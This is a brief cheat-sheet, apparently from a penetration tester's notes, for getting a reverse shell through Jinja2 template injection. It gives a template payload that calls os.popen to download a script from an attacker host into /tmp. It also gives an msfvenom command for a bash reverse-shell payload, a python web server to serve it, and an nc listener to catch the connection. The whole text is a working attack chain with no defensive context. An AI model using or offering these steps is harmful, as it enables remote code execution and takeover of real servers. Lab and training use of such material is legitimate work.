Jinja2

LFI reverse shell

Kali:10.10.10.10

[1A]Target: inject the following command

{{config.class.init.globals['os'].popen('wget http://10.10.10.10:8000/revshell.sh -O /tmp/revshell.sh').read()}}

[1B] Generate msfvenom reverse shell (bash)

msfvenom -p cmd/unix/reverse_bash lhost=10.10.10.10 lport=4444 -f raw -o revshell.sh

[2]Serve reverse shell payload on port 8000 with python server

python3 -m http.server 8000

[3] Catch revshell nc -nvlp 4444

Last updated